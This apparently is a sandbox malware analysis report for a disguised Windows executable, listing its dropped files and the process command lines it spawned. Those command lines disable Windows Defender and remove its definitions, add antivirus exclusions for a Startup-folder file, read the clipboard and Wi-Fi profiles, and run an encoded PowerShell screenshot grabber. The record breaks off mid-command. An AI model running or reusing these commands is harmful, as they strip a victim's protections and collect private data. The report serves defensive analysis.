Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
#U202f#U202f#U2005#U00a0.scr.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\QzNtG.zip
|
RAR archive data, v5
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.key
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\??? \Display (1).png
|
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MpCmdRun.log
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\RES6756.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sun Aug 4 02:13:43 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\_sqlite3.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\_ssl.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-console-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-datetime-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-debug-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-errorhandling-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-2-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l2-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-handle-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-heap-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-interlocked-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-libraryloader-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-localization-l1-2-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-memory-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-namedpipe-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processenvironment-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-1.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-profile-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-rtlsupport-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-string-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-2-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-sysinfo-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-timezone-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-util-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-conio-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-convert-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-environment-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-filesystem-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-heap-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-locale-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-math-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-process-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-runtime-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-stdio-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-string-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-time-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-utility-l1-1-0.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\libcrypto-3.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\libffi-8.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\libssl-3.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\python312.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\select.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\sqlite3.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\ucrtbase.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ric4va3.zfn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kckqprz.iaa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3sbbme0r.vlf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3x1or3kc.dz1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ycgcdox.5ji.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kwun0or.kqx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arfxlphr.jtx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cehndozn.1kt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evf4zszv.cxz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsj2c4gj.xvf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gaxjbgjc.1d5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3vnjgc0.mf2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpvl03jk.qtf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofim2axs.cug.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbntxrea.jqh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1whz1zs.vmd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rclviame.ank.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpg5r4x5.ztf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_taz2xs5r.f43.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucbjvdr1.jdn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umcknxo3.uph.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ur3qxbib.jfl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xen0z0ng.030.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzrfgrgf.hm5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.0.cs
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
|
modified
|
||
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 86 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
|
"C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
|
||
C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
|
"C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection
$true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection
AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent
2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring
$true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting
Disabled -SubmitSamplesConsent NeverSend
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\StartUp\? ? .scr'"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-Clipboard
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "systeminfo"
|
||
C:\Windows\System32\netsh.exe
|
netsh wlan show profile
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
|
||
C:\Windows\System32\systeminfo.exe
|
systeminfo
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAg